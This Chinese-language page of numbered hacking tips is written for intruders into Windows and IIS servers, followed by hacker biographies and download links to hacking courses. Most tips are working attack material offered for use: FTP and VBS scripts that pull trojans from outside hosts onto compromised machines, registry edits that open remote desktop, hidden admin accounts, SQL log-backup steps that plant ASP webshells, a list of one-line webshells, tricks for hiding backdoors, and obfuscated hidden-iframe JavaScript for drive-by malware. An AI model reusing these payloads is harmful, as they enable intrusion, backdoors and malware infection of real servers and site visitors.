36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
然后执行ftp -s:c:\1.bat即可

37、修改注册表开3389两法
（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo “Enabled”=”0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
echo “ShutdownWithoutLogon”=”0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo “EnableAdminTSRemote”=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg
echo “TSEnabled”=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo “Start”=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg
echo “Start”=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo “Hotkey”=”1″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo “PortNumber”=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>3389.reg
echo “PortNumber”=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
（2）winxp和win2003终端开启
用以下ECHO代码写一个REG文件：
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
echo “fDenyTSConnections”=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启

38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
用查询分析器运行 EXEC sp_password NULL, ‘你要改的密码’, ‘sa’

39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
（1）数据库文件名应复杂并要有特殊字符
（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
DBPath = Server.MapPath(“数据库.mdb”)
conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” ＆ DBPath

修改为：conn.open “ODBC数据源名称,” 然后指定数据库文件的位置
（3）不放在WEB目录里

40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex

41、映射对方盘符
telnet到他的机器上，
net share 查看有没有默认共享 如果没有，那么就接着运行
net share c$=c:
net share现在有c$
在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K

42、一些很有用的老知识
type c:\boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8

43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe “regedit -s F:\longyi.biz\RAdmin.reg” 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:\ftp.exe “regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin”

44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）

45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
echo Set x= CreateObject(^”Microsoft.XMLHTTP^”):x.Open
^”GET^”,LCase(WScript.Arguments(0)),0:x.Send():Set s =
CreateObject(^”ADODB.Stream^”):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
（这是完整的一句话，其中没有换行符）
然后下载:
cscript down.vbs http://www.hack520.org/hack.exe hack.exe

46、一句话木马成功依赖于两个条件：
１、服务端没有禁止adodb.Stream或FSO组件
２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

47、利用DB_OWNER权限进行手工备份一句话木马的代码：
;alter database utsz set RECOVERY FULL–
;create table cmd (a image)–
;backup log utsz to disk = ‘D:\cmd’ with init–
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)–
;backup log utsz to disk = ‘D:\utsz_web\utsz\hacker.asp’–
注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。

48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有会话用 ‘all’。
-s sessionid列出会话的信息。
-k sessionid终止会话。
-m sessionid发送消息到会话。

config配置 telnet 服务器参数。

common_options 为:
-u user 指定要使用其凭据的用户
-p password 用户密码

config_options 为:
 dom = domain 设定用户的默认域
 ctrlakeymap = yes|no 设定 ALT 键的映射
 timeout = hh:mm:ss 设定空闲会话超时值
 timeoutactive = yes|no 启用空闲会话。
 maxfail = attempts 设定断开前失败的登录企图数。
 maxconn = connections设定最大连接数。
 port = number设定 telnet 端口。
 sec = [+/-]NTLM [+/-]passwd
设定身份验证机构
 fname = file 指定审计文件名。
 fsize = size 指定审计文件的最大尺寸(MB)。
 mode = console|stream指定操作模式。
 auditlocation = eventlog|file|both
指定记录地点
 audit = [+/-]user [+/-]fail [+/-]admin

49、例如:在IE上访问:
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
hack.txt里面的代码是：
<body> <META HTTP-EQUIV=”Refresh” CONTENT=”5;URL=http://www.hack520.org/”>
把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

50、autorun的病毒可以通过手动限制！
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
2，打开盘符用右键打开！切忌双击盘符～
3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！

51、log备份时的一句话木马：
a).<%%25Execute(request(“go”))%%25>
b).<%Execute(request(“go”))%>
c).%><%execute request(“go”)%><%
d).<script language=VBScript runat=server>execute request(“sb”)</Script>
e).<%25Execute(request(“l”))%25>
f).<%if request(“cmd”)<>”" then execute request(“pass”)%>

52、at “12:17″ /interactive cmd
执行后可以用AT命令查看新加的任务
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。

53、隐藏ASP后门的两种方法
1、建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容：<!–#include file=”12.jpg”–>
新建12.jpg文件内容：<%execute(request(“l”))%> 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt

54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。

55、JS隐蔽挂马
1.
var tr4c3=”<iframe src=ht”;
tr4c3 = tr4c3+”tp:/”;
tr4c3 = tr4c3+”/ww”;
tr4c3 = tr4c3+”w.tr4″;
tr4c3 = tr4c3+”c3.com/inc/m”;
tr4c3 = tr4c3+”m.htm style=”display:none”></i”;
tr4c3 =tr4c3+”frame>’”;
document.write(tr4c3);
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。

2.
转换进制，然后用EVAL执行。如
eval(“\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73″);
不过这个有点显眼。
3.
document.write (‘<iframe src=http://www.tr4c3.com/inc/mm.htm style=”display:none”></iframe>’);
最后一点，别忘了把文件的时间也修改下。

56.3389终端入侵常用DOS命令
taskkill  taskkill /PID 1248 /t

tasklist  查进程

cacls “C:\Program Files\ewido anti-spyware 4.0\guard.exe” /d:everyone  改、降低某文件权限
iisreset /reboot
tsshutdn /reboot /delay:1    重起服务器

logoff 12  要使用会话 ID（例如，会话 12）从会话中注销用户，

query user  查看当前终端用户在线情况

要显示有关所有会话使用的进程的信息，请键入：query process *

要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2

要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统

命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机

56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write(‘<body></body>’);document.body.innerText=s;

源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。

57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
用net localgroup administrators是可以看到管理组下，加了$的用户的。

58、 sa弱口令相关命令

一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
exec sp_password NULL,’20001001′,’sa’
(提示：慎用!)

二.简单修补sa弱口令.

方法1:查询分离器连接后执行：
if exists (select * from
dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]‘) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N’[dbo].[xp_cmdshell]‘

GO

然后按F5键命令执行完毕

方法2:查询分离器连接后
第一步执行：use master
第二步执行：sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令执行完毕

三.常见情况恢复执行xp_cmdshell.

1  未能找到存储过程’master..xpcmdshell’.
恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

2  无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc “xp_cmdshell”
第二步执行：sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

3  无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators  用户名 /add’

xp或2003server系统:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 用户名 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add’

59、开23端口telnet的话，太危险了。
大家都可以扫描到。就不是个人的后门了。。
这里很简单只需要一句命令：
tlntadmn config port=1001
这句命令的意思是把telnet23端口改为1001
大家可以自己更改在1025以内的端口。。可以欺骗性的改25。。呵呵

　　黑客防线Linux特训班全部课程！！跟官方发布的一样多，也是23课，应该是Linux全部的课程了。

　　经测试可以下，下载速度不是很快，点击这里下载。

我要更加努力啦~~

　　1、凯文·米特尼克(Kevin Mitnick)

　　 从某种意义上讲，米特尼克也许已经成为黑客的同义词。美国司法部曾经将米特尼克称为“美国历史上被通缉的头号计算机罪犯”，他的所作所为已经被记录在两部好莱坞电影中，分别是《Takedown》和《Freedom Downtime》。

　　米特尼克“事业”的起点是破解洛杉矶公交车打卡系统，他因此得以免费乘车。在此之后，他也同 苹果联合创始人史蒂夫·沃兹尼亚克(Steve Wozniak)一样，试图盗打电话。米特尼克首次被宣判有罪是因为非法侵入Digital Equipment公司的计算机网络，并窃取软件。

　　之后的两年半时间里，米特尼克展开了疯狂的黑客行动。他开始侵入计算机，破坏电话网络，窃取公司商业秘密，并最终闯入了美国国防部预警系统。最终，他因为入侵计算机专家、黑客Tsutomu Shimomura的家用计算机而落网。在长达5年零8个月的单独监禁之后，米特尼克现在的身份是一位计算机安全作家、顾问和演讲者。

　　关于他的详细事迹请查看本站：世界头号黑客—Kevin Mitnick（凯文·米特尼克）

　　2、阿德里安·拉莫(Adrian Lamo)

　　拉莫专门找大公司或组织下手，例如入侵微软和《纽约时报》的内部网络。他经常利用咖啡店、金考复印店或图书馆的网络来从事黑客行为，因此他获得了一个“不回家的黑客”的绰号。拉莫经常能发现安全漏洞，并对其加以利用。通常情况下，他会通知企业有关漏洞的信息。

　　在拉姆的受害者名单上包括雅虎、花旗银行、美洲银行和Cingular等知名公司。白帽黑客这样做并不违法，因为他们受雇于公司。但是，拉莫却从事着非法行为。由于侵入《纽约时报》内部网络，拉莫成为顶尖数码罪犯之一。也正是因为这一罪行，他被处以6.5万美元罚款，以及六个月家庭禁闭和两年缓刑。拉莫现在是一位著名公共发言人，同时还是一名获奖记者。

　　3、乔纳森·詹姆斯(Jonathan James)

　　 在16岁时，詹姆斯成为了第一名因为黑客行为而被送入监狱的未成年人，并因此恶名远播。他此后承认自己当初只是为了好玩和寻求挑战。

　　詹姆斯曾经入侵过很多著名组织，包括美国国防部下设的国防威胁降低局。通过此次黑客行动，他可以捕获用户名和密码，并浏览高度机密的电子邮件。詹姆斯还曾入侵过美国宇航局的计算机，并窃走价值170万美元的软件。据美国司法部长称，他所窃取的软件主要用于维护国际空间站的物理环境，包括对湿度和温度的控制。

　　当詹姆斯的入侵行为被发现后，美国宇航局被迫关闭了整个计算机系统，并因此花费了纳税人的4.1万美元。目前，詹姆斯正计划成立一家计算机安全公司。

　　4、罗伯特·塔潘-莫里斯(Robert Tappan Morris)

　　莫里斯的父亲是前美国国家安全局的一名科学家，名叫罗伯特·莫里斯(Robert Morris)。他是莫里斯蠕虫的制造者，这是首个通过互联网传播的蠕虫。正因为如此，他成为了首位依据1986年《计算机欺诈和滥用法》被起诉的人。

　　莫里斯在康奈尔大学就读期间制作了蠕虫，当时的目的仅仅是探究互联网有多大。然而，莫里斯蠕虫以无法控制的方式自我复制，造成很多计算机死机。据专家称，约有6000台计算机遭到破坏。他最后被判处3年缓刑、400小时社区服务和1.05万美元罚款。

　　莫里斯目前是麻省理工大学计算机科学和人工智能实验室的一名终身教授，主攻方向是计算机网络架构。

　　5、凯文·鲍尔森(Kevin Poulsen)

　　鲍尔森经常被称为“黑暗但丁”，他因非法入侵洛杉矶KIIS-FM电话线路而全美闻名，同时也因此获得了一辆保时捷汽车。就连美国联邦调查局(FBI)也开始追查鲍尔森，因为他闯入了FBI数据库和联邦计算机，目的是获取敏感的窃听信息。

　　鲍尔森的专长是入侵电话线路，他经常占据一个基站的全部电话线路。鲍尔森还经常重新激活黄页上的电话号码，并提供给自己的伙伴用于出售。他最终在一家超市被捕，并被处以五年监禁。

　　在监狱服刑期间，鲍尔森担任了《连线》杂志的记者，并升任高级编辑。在他最著名的一篇文章中，主要讲述了他如何通过Myspace个人资料找到744名性犯罪者。

Linux攻防教程1-Vmware下CentOS的安装

http://124.238.224.141/vipsoft1/vip1-down/linux/1-CentOS-ok.rar

Linux攻防教程2-CentOS的常用命令I

http://124.238.224.141/vipsoft1/vip1-down/linux/2-CentOSI.rar

Linux攻防教程3-CentOS的常用命令II

http://124.238.224.141/vipsoft1/vip1-down/linux/3-CentOSII.rar

Linux攻防教程4-vi入门教程

http://124.238.224.141/vipsoft1/vip1-down/linux/4-vi.rar

Linux攻防教程5-Shell简介及进程管理

http://124.238.224.141/vipsoft1/vip1-down/linux/5-Shell.rar

Linux攻防教程6-构建SSH服务器

http://124.238.224.141/vipsoft1/vip1-down/linux/6-ssh.rar

Linux攻防教程7-常见linux网络命令简介

http://124.238.224.141/vipsoft1/vip1-down/linux/7-ml.rar

http://lib.verycd.com/2007/07/08/0000155897.html

《黑鹰vip光盘全集 价值168元》

http://lib.verycd.com/2006/09/13/0000119656.html

《黑客基地VIP会员区视频教程》

http://lib.verycd.com/2005/06/25/0000055170.html

《黑客教程之一：黑客动画教程》动画+软件+代码[ISO]

http://lib.verycd.com/2004/09/30/0000022034.html

《精通脚本黑客配套光盘》[ISO]

http://lib.verycd.com/2007/05/29/0000151830.html

《黑客防线2007年随书光盘1至6期》[ISO]

http://lib.verycd.com/2007/04/13/0000146525.html

《黑客攻防实战入门》[PDF]

http://lib.verycd.com/2007/02/22/0000140669.html

《黑客手册配套光盘》(NoHack CD)2007年（更新到7月）

http://lib.verycd.com/2007/02/27/0000141372.html

《黑客手册配套光盘》(NoHack CD)2006年1～12月（全）[ISO]

http://lib.verycd.com/2007/03/01/0000141600.html

《黑客就这么几招》(第2版)PDF

http://lib.verycd.com/2007/02/14/0000139832.html

《加密与破解行家一点通》PDF

http://lib.verycd.com/2007/02/15/0000139967.html

《黑客防线2006年10期随书光盘》(hacker)[ISO]

http://lib.verycd.com/2006/10/29/0000125902.html

《黑鹰基地.VIP.ASP网页教程》[ISO]

http://lib.verycd.com/2006/08/22/0000116760.html

《最新黑客奇技赢巧大搜捕》中文[ISO]

http://lib.verycd.com/2006/07/07/0000109756.html

《黑客防线2006年11期随书光盘》(Hacker Defence Vol.2006-11)[ISO]

http://lib.verycd.com/2006/12/01/0000130218.html

《黑客任务实战——攻略篇》

http://lib.verycd.com/2004/11/08/0000025648.html

《黑客任务实战——防护篇》

http://lib.verycd.com/2004/11/08/0000025650.html

《黑客基地delphi特训班》

http://lib.verycd.com/2007/07/13/0000156388.html

《黑客基地php特训班》

http://lib.verycd.com/2007/07/13/0000156389.html

《电脑爱好者2007上半年合订本》2007[ISO]

http://lib.verycd.com/2007/07/14/0000156526.html

《黑客手册配套光盘》(NoHack CD)2007年（更新到7月）

http://lib.verycd.com/2007/02/27/0000141372.html

《黑客基地Linux特训班》

http://lib.verycd.com/2007/07/12/0000156316.html

《黑客基地C语言特训班》

http://lib.verycd.com/2007/07/12/0000156321.html

《黑客基地汇编特训班》

http://lib.verycd.com/2007/07/11/0000156205.html

《Windows 2000网络环境管理》PDF中文版

http://lib.verycd.com/2007/07/06/0000155709.html

《服务器的故障与安全解决方案》[ISO]

http://lib.verycd.com/2007/03/16/0000143222.html

《MySQL网络数据库指南.rar》[pdf]

http://lib.verycd.com/2007/03/22/0000144093.html

《黑客终结–网络安全完全解决方案》[PDF]

http://lib.verycd.com/2007/03/24/0000144333.html

《2007网络安全精品黄皮书》[EXE]

http://lib.verycd.com/2007/02/15/0000139962.html

《Windows防火墙与网络封包截获技术》PDF

http://lib.verycd.com/2007/02/15/0000139964.html

《黑客任务实战:攻略篇》PDF

http://lib.verycd.com/2007/02/19/0000140402.html

《黑客大暴光：网络安全机密与解决方案》(Network Security Secrets & Solutions Hacking Exposed)第5版

http://lib.verycd.com/2006/12/21/0000132722.html

《精通CSS,DIV+CSS 别具风格》

http://lib.verycd.com/2007/01/01/0000134033.html

《编程之道—C C++程序设计入门》

http://lib.verycd.com/2006/11/10/0000127414.html

《编程之道—Delphi 7程序设计入门》

http://lib.verycd.com/2006/11/10/0000127415.html

《编程之道—ASP数据库编程入门》

http://lib.verycd.com/2006/11/10/0000127416.html

《编程之道—Java程序设计入门》

http://lib.verycd.com/2006/11/10/0000127417.html

《黑基VIP中级提高班》(PHP学习1-13)

http://lib.verycd.com/2006/11/28/0000129916.html

《黑鹰基地VB教程》[ISO]

http://lib.verycd.com/2006/09/17/0000120309.html

《黑鹰基地Win2003系列视频教程》[ISO]

http://lib.verycd.com/2006/09/17/0000120295.html

《VC++深入详解 随书教学视频DVD光盘》

http://lib.verycd.com/2006/07/08/0000109909.html

《黑客防线2006精华奉献本》[ISO]

http://lib.verycd.com/2006/05/17/0000103139.html

《计算机病毒与木马程序剖析》

http://lib.verycd.com/2006/03/30/0000096584.html

《Delphi下深入Windows核心编程》PDF(附原书光盘代码)

http://lib.verycd.com/2005/11/22/0000076055.html

《黑客.X.档案.2005.-.6》(HackerXFiles)2005-6[ISO]

http://lib.verycd.com/2005/09/02/0000063573.html

《电脑报出版黑客日记随书光盘》[ISO]

http://lib.verycd.com/2005/09/02/0000063622.html